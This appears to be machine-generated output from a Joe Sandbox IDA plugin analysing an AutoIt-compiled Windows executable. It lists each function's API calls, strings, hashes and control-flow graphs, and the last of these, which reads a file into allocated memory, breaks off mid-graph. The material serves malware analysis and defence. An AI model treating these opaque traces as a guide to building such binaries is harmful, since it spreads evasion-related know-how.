              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
              • String ID:
              • API String ID: 1986165174-0
              • Opcode ID: 1bcdd115bb6a1082a49f033411fbda44d9242439f6f12a3cf4782ac89b182eb1
              • Instruction ID: c38af92a25308572ba4ed16473ac9edb30c4cbff0a4ab7372378909c575fb140
              • Opcode Fuzzy Hash: 1bcdd115bb6a1082a49f033411fbda44d9242439f6f12a3cf4782ac89b182eb1
              • Instruction Fuzzy Hash: 6C91E53154ABC1DFC735DB7895511AAFFE4AF2A300B484D9ED0CB83A41D721EA08CB69
              Function 00184FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1104 184fe9-185001 CreateStreamOnHGlobal 1105 185021-185026 1104->1105 1106 185003-18501a FindResourceExW 1104->1106 1107 1bdd5c-1bdd6b LoadResource 1106->1107 1108 185020 1106->1108 1107->1108 1109 1bdd71-1bdd7f SizeofResource 1107->1109 1108->1105 1109->1108 1110 1bdd85-1bdd90 LockResource 1109->1110 1110->1108 1111 1bdd96-1bdd9e 1110->1111 1112 1bdda2-1bddb4 1111->1112 1112->1108
              APIs
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00184EEE,?,?,00000000,00000000), ref: 00184FF9
              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00184EEE,?,?,00000000,00000000), ref: 00185010
              • LoadResource.KERNEL32(?,00000000,?,?,00184EEE,?,?,00000000,00000000,?,?,?,?,?,?,00184F8F), ref: 001BDD60
              • SizeofResource.KERNEL32(?,00000000,?,?,00184EEE,?,?,00000000,00000000,?,?,?,?,?,?,00184F8F), ref: 001BDD75
              • LockResource.KERNEL32(00184EEE,?,?,00184EEE,?,?,00000000,00000000,?,?,?,?,?,?,00184F8F,00000000), ref: 001BDD88
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
              • String ID: SCRIPT
              • API String ID: 3051347437-3967369404
              • Opcode ID: 2b9a13c04697c4616957d0418a90f329120d75fd15157106958bcd750cdb39fe
              • Instruction ID: 9a66791de611bdaf73e5d58982bbdc9a3e895872855262b8bd934c39ab91d1ea
              • Opcode Fuzzy Hash: 2b9a13c04697c4616957d0418a90f329120d75fd15157106958bcd750cdb39fe
              • Instruction Fuzzy Hash: 5A115A75240700AFD7319B65ED58F677BBAEBC9B51F208168F806966A0DB61E8008A60
              Function 0018E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID: Dt$$Dt$$Dt$$Dt$$Variable must be of type 'Object'.
              • API String ID: 0-2211162405
              • Opcode ID: 21faca3bfed998b019cabf053458f553931800358dd5a91d5759cd196cbead95
              • Instruction ID: ad9a08fba476d31a70044156423022d49632e5bbd1521ebb02fde78640175130
              • Opcode Fuzzy Hash: 21faca3bfed998b019cabf053458f553931800358dd5a91d5759cd196cbead95
              • Instruction Fuzzy Hash: B0A26974A04215CFCB28EF98C480AADB7F2BF59304F258469E916AB351D771EE42CF91
              Function 001E4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
              Download Yara Rule
              APIs
              • GetFileAttributesW.KERNELBASE(?,001BE7C1), ref: 001E46A6
              • FindFirstFileW.KERNELBASE(?,?), ref: 001E46B7
              • FindClose.KERNEL32(00000000), ref: 001E46C7
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FileFind$AttributesCloseFirst
              • String ID:
              • API String ID: 48322524-0
              • Opcode ID: b8c1efc304220ac0a8e050c5bf697ac760a130c7100b9b20350dffe03b0de58a
              • Instruction ID: b02d26fbccb00d236b490a24d0952fe8e0371e95728df409319727971751c105
              • Opcode Fuzzy Hash: b8c1efc304220ac0a8e050c5bf697ac760a130c7100b9b20350dffe03b0de58a
              • Instruction Fuzzy Hash: 64E0D8318109005B8220B738FC4D4EE775C9E0A335F100715F975C18E1E7B069508599
              Function 00190B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
              Download Yara Rule
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00190BBB
              • timeGetTime.WINMM ref: 00190E76
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00190FB3
              • TranslateMessage.USER32(?), ref: 00190FC7
              • DispatchMessageW.USER32(?), ref: 00190FD5
              • Sleep.KERNEL32(0000000A), ref: 00190FDF
              • LockWindowUpdate.USER32(00000000,?,?), ref: 0019105A
              • DestroyWindow.USER32 ref: 00191066
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00191080
              • Sleep.KERNEL32(0000000A,?,?), ref: 001C52AD
              • TranslateMessage.USER32(?), ref: 001C608A
              • DispatchMessageW.USER32(?), ref: 001C6098
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001C60AC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr$$pr$$pr$$pr$
              • API String ID: 4003667617-300143931
              • Opcode ID: 995d3caf73903df0ec47d994deea7815274a228dc997bc23c654d29b4ed5e426
              • Instruction ID: 59e531b9140b529d6b21ceef33a5259d527e8f2ec1c281cf51b4abeccdf0d1c3
              • Opcode Fuzzy Hash: 995d3caf73903df0ec47d994deea7815274a228dc997bc23c654d29b4ed5e426
              • Instruction Fuzzy Hash: 01B2B270608741DFDB29DF24C884FAABBE5BFA5304F14491DF49A87291DB71E984CB82
              Function 001E93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 001E91E9: __time64.LIBCMT ref: 001E91F3
                • Part of subcall function 00185045: _fseek.LIBCMT ref: 0018505D
              • __wsplitpath.LIBCMT ref: 001E94BE
                • Part of subcall function 001A432E: __wsplitpath_helper.LIBCMT ref: 001A436E
              • _wcscpy.LIBCMT ref: 001E94D1
              • _wcscat.LIBCMT ref: 001E94E4
              • __wsplitpath.LIBCMT ref: 001E9509
              • _wcscat.LIBCMT ref: 001E951F
              • _wcscat.LIBCMT ref: 001E9532
                • Part of subcall function 001E922F: _memmove.LIBCMT ref: 001E9268
                • Part of subcall function 001E922F: _memmove.LIBCMT ref: 001E9277
              • _wcscmp.LIBCMT ref: 001E9479
                • Part of subcall function 001E99BE: _wcscmp.LIBCMT ref: 001E9AAE
                • Part of subcall function 001E99BE: _wcscmp.LIBCMT ref: 001E9AC1
              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001E96DC
              • _wcsncpy.LIBCMT ref: 001E974F
              • DeleteFileW.KERNEL32(?,?), ref: 001E9785
              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001E979B
              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001E97AC
              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001E97BE
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
              • String ID:
              • API String ID: 1500180987-0
              • Opcode ID: b49a124899a435a0730ff8d28eeca0543e917ccfd73af7fe9873b8468960b252
              • Instruction ID: e9fd979a91ff82cd82144dd93f103865aefb0fe8a320d2a731110be32e9f767a
              • Opcode Fuzzy Hash: b49a124899a435a0730ff8d28eeca0543e917ccfd73af7fe9873b8468960b252
              • Instruction Fuzzy Hash: 8EC13BB1D00619AECF21DF95CC85ADEB7BDEF59300F1040AAF609E7151EB709A848F65
              Function 00183015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 00183074
              • RegisterClassExW.USER32(00000030), ref: 0018309E
              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001830AF
              • InitCommonControlsEx.COMCTL32(?), ref: 001830CC
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001830DC
              • LoadIconW.USER32(000000A9), ref: 001830F2
              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00183101
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
              • API String ID: 2914291525-1005189915
              • Opcode ID: 2424af76ca57a0908dd976a2db8f3c77ceeb28bb9c0facbb2982ec5031d9374b
              • Instruction ID: a68a998bb7a92538729a5aaa9c7278c0b50d4696cf1b2c378f4fdee2dafbf1eb
              • Opcode Fuzzy Hash: 2424af76ca57a0908dd976a2db8f3c77ceeb28bb9c0facbb2982ec5031d9374b
              • Instruction Fuzzy Hash: 113169B5884349AFDB51CFA4E98DAD9BFF0FB0A310F14416AE580E62A1D3B50545CF52
              Function 00183041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 00183074
              • RegisterClassExW.USER32(00000030), ref: 0018309E
              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001830AF
              • InitCommonControlsEx.COMCTL32(?), ref: 001830CC
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001830DC
              • LoadIconW.USER32(000000A9), ref: 001830F2
              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00183101
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
              • API String ID: 2914291525-1005189915
              • Opcode ID: 6b38da8655c155b630bca62e5eae8a453a8dbd484402290a4d0823fd338ad57b
              • Instruction ID: 345a061978ea0bbd473faa09d43d1657826857ebb1772dc10085a71ee45a4750
              • Opcode Fuzzy Hash: 6b38da8655c155b630bca62e5eae8a453a8dbd484402290a4d0823fd338ad57b
              • Instruction Fuzzy Hash: 4321F4B5990308AFDB50DFA4FD8CB9DBBF5FB0A700F00412AF910A66A1D7B145448F92
              Function 001871EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 00184864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002462F8,?,001837C0,?), ref: 00184882
                • Part of subcall function 001A074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,001872C5), ref: 001A0771
              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00187308
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001BECF1
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001BED32
              • RegCloseKey.ADVAPI32(?), ref: 001BED70
              • _wcscat.LIBCMT ref: 001BEDC9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
              • API String ID: 2673923337-2727554177
              • Opcode ID: 3beb54ff58271bce5211921db114d75db489a03281a51b9980c49bf3c0a3b883
              • Instruction ID: 9f8a0aff158291952602d5dee92980045372a33067cba0547408ff1f64083feb
              • Opcode Fuzzy Hash: 3beb54ff58271bce5211921db114d75db489a03281a51b9980c49bf3c0a3b883
              • Instruction Fuzzy Hash: EA7171755083019EC314EF65EC8589BB7E8FF6A740F54492EF855831A1DBB0DA48CFA2
              Function 00183633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 760 183633-183681 762 1836e1-1836e3 760->762 763 183683-183686 760->763 762->763 766 1836e5 762->766 764 183688-18368f 763->764 765 1836e7 763->765 767 18375d-183765 PostQuitMessage 764->767 768 183695-18369a 764->768 770 1836ed-1836f0 765->770 771 1bd31c-1bd34a call 1911d0 call 1911f3 765->771 769 1836ca-1836d2 DefWindowProcW 766->769 776 183711-183713 767->776 772 1bd38f-1bd3a3 call 1e2a16 768->772 773 1836a0-1836a2 768->773 775 1836d8-1836de 769->775 777 1836f2-1836f3 770->777 778 183715-18373c SetTimer RegisterWindowMessageW 770->778 807 1bd34f-1bd356 771->807 772->776 800 1bd3a9 772->800 781 1836a8-1836ad 773->781 782 183767-183776 call 184531 773->782 776->775 779 1836f9-18370c KillTimer call 1844cb call 183114 777->779 780 1bd2bf-1bd2c2 777->780 778->776 783 18373e-183749 CreatePopupMenu 778->783 779->776 792 1bd2f8-1bd317 MoveWindow 780->792 793 1bd2c4-1bd2c6 780->793 787 1836b3-1836b8 781->787 788 1bd374-1bd37b 781->788 782->776 783->776 798 18374b-18375b call 1845df 787->798 799 1836be-1836c4 787->799 788->769 797 1bd381-1bd38a call 1d817e 788->797 792->776 794 1bd2c8-1bd2cb 793->794 795 1bd2e7-1bd2f3 SetFocus 793->795 794->799 803 1bd2d1-1bd2e2 call 1911d0 794->803 795->776 797->769 798->776 799->769 799->807 800->769 803->776 807->769 811 1bd35c-1bd36f call 1844cb call 1843db 807->811 811->769
              APIs
              • DefWindowProcW.USER32(?,?,?,?), ref: 001836D2
              • KillTimer.USER32(?,00000001), ref: 001836FC
              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0018371F
              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0018372A
              • CreatePopupMenu.USER32 ref: 0018373E
              • PostQuitMessage.USER32(00000000), ref: 0018375F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
              • String ID: TaskbarCreated$%!
              • API String ID: 129472671-72691048
              • Opcode ID: 625917fbe11ef33e427d325ed64331c076d61c281fd8f07722c4e6e76ce3cfd3
              • Instruction ID: 969a5362b3ad657189755df11889820fa0bc587b5aad8664de1114d19c915be5
              • Opcode Fuzzy Hash: 625917fbe11ef33e427d325ed64331c076d61c281fd8f07722c4e6e76ce3cfd3
              • Instruction Fuzzy Hash: 614108B1200545BBDB28BF28FC4DB7D3755E712B00F280529F912862B2EBA1DF559B63
              Function 00183A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 00183A62
              • LoadCursorW.USER32(00000000,00007F00), ref: 00183A71
              • LoadIconW.USER32(00000063), ref: 00183A88
              • LoadIconW.USER32(000000A4), ref: 00183A9A
              • LoadIconW.USER32(000000A2), ref: 00183AAC
              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00183AD2
              • RegisterClassExW.USER32(?), ref: 00183B28
                • Part of subcall function 00183041: GetSysColorBrush.USER32(0000000F), ref: 00183074
                • Part of subcall function 00183041: RegisterClassExW.USER32(00000030), ref: 0018309E
                • Part of subcall function 00183041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001830AF
                • Part of subcall function 00183041: InitCommonControlsEx.COMCTL32(?), ref: 001830CC
                • Part of subcall function 00183041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001830DC
                • Part of subcall function 00183041: LoadIconW.USER32(000000A9), ref: 001830F2
                • Part of subcall function 00183041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00183101
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
              • String ID: #$0$AutoIt v3
              • API String ID: 423443420-4155596026
              • Opcode ID: 9ae745bc8f03e6309eccb1522d4677be1b70cf677aed691b1120b40234a2f054
              • Instruction ID: ccd4ba16790b2f1c727b94a7cfe85040f98aee273c7f2248d5c82143cc2b2630
              • Opcode Fuzzy Hash: 9ae745bc8f03e6309eccb1522d4677be1b70cf677aed691b1120b40234a2f054
              • Instruction Fuzzy Hash: BC213778940308BFEB10DFA4FD4DB9D7BB5FB0A711F00012AE904A62A1D3BA56548F86
              Function 00183778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
              Download Yara Rule

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b$
              • API String ID: 1825951767-1989799342
              • Opcode ID: 6b036a08011831c54eb505920a154f1175b4541b9eac1139e3efa4b433a5853c
              • Instruction ID: 1cfba9009d382f888eda8dc7c157c0bebe02ae616af432fc0ff7cce76478ed7a
              • Opcode Fuzzy Hash: 6b036a08011831c54eb505920a154f1175b4541b9eac1139e3efa4b433a5853c
              • Instruction Fuzzy Hash: 19A16075D10229ABCB08FBA0DC95AEEB778BF25700F540529F422A7191EF749B09CF61
              Function 0018F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001A03D3
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001A03DB
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001A03E6
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001A03F1
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001A03F9
                • Part of subcall function 001A03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 001A0401
                • Part of subcall function 00196259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0018FA90), ref: 001962B4
              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0018FB2D
              • OleInitialize.OLE32(00000000), ref: 0018FBAA
              • CloseHandle.KERNEL32(00000000), ref: 001C49F2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
              • String ID: <g$$\d$$%!$c$
              • API String ID: 1986988660-3339779836
              • Opcode ID: 48e712a948bcdc7a0c516c4bd8ac72abba7a2754321425ac6a28b22cdbc16850
              • Instruction ID: 0e6dfc72cb0e4cf5a98a7c333b1052dc9f86c9b547582349f9804a6e19b8c80b
              • Opcode Fuzzy Hash: 48e712a948bcdc7a0c516c4bd8ac72abba7a2754321425ac6a28b22cdbc16850
              • Instruction Fuzzy Hash: 7981CBB89113908ECBA8EF79F94C655BBE4FBABB18310817AD019C7262EB314455CF13
              Function 01402690 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 983 1402690-140273e call 1400000 986 1402745-140276b call 14035a0 CreateFileW 983->986 989 1402772-1402782 986->989 990 140276d 986->990 995 1402784 989->995 996 1402789-14027a3 VirtualAlloc 989->996 991 14028bd-14028c1 990->991 993 1402903-1402906 991->993 994 14028c3-14028c7 991->994 997 1402909-1402910 993->997 998 14028d3-14028d7 994->998 999 14028c9-14028cc 994->999 995->991 1002 14027a5 996->1002 1003 14027aa-14027c1 ReadFile 996->1003 1004 1402912-140291d 997->1004 1005 1402965-140297a 997->1005 1000 14028e7-14028eb 998->1000 1001 14028d9-14028e3 998->1001 999->998 1008 14028fb 1000->1008 1009 14028ed-14028f7 1000->1009 1001->1000 1002->991 1010 14027c3 1003->1010 1011 14027c8-1402808 VirtualAlloc 1003->1011 1012 1402921-140292d 1004->1012 1013 140291f 1004->1013 1006 140298a-1402992 1005->1006 1007 140297c-1402987 VirtualFree 1005->1007 1007->1006 1008->993 1009->1008 1010->991 1014 140280a 1011->1014 1015 140280f-140282a call 14037f0 1011->1015 1016 1402941-140294d 1012->1016 1017 140292f-140293f 1012->1017 1013->1005 1014->991 1023 1402835-140283f 1015->1023 1018 140295a-1402960 1016->1018 1019 140294f-1402958 1016->1019 1021 1402963 1017->1021 